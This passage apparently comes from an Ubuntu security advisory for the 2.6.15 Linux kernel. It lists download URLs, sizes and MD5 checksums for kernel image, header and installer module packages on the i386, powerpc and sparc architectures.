http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb
  Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53554 afc415fd0a28c363579986fc48464671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    98468 ddb974591a687460f50c26a2e2682593
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   299158 458051a07217501718f6e2a742bec0a3

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    51536 d2c7a02ac033097208c359312e95d246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2482 3c964c577c93d80cee55d06e78003951
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40906 84f84dc75718a347eb6623204cab6209
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29892 4a807f384985ae3376d509474716f13a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45054 a2373aac90339698b2cba11e43978565
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     1934 0887612df6acbc867949c33251427c00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2198 d38a4ec22579275ff2f48805be734356
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   161908 70564b18529d383509cb4c1d4898425a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872596 8602056ab95806f02667587737cb3b59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb
  Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17386 1abc2376b554610aec23e87f60998358
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    85854 59c8914383ae0624690950d8f844c101
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    60378 183583ac6a0ab738109499861a861ca2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    70420 da9263ada0b850362f022c36b6769f22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115790 ac0661102201e3f682eda1052d987671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   168082 6f375034031b861fe42ba973c9390ded
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40380 c083f0781fb33b64329d10c233affde2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   149304 958f0b630326763cddddce5503f3319d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5:   773010 979da22c264d122841ea140319b365ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb
  Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5: 15017856 479231852577fdd0e402556287a02059
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb
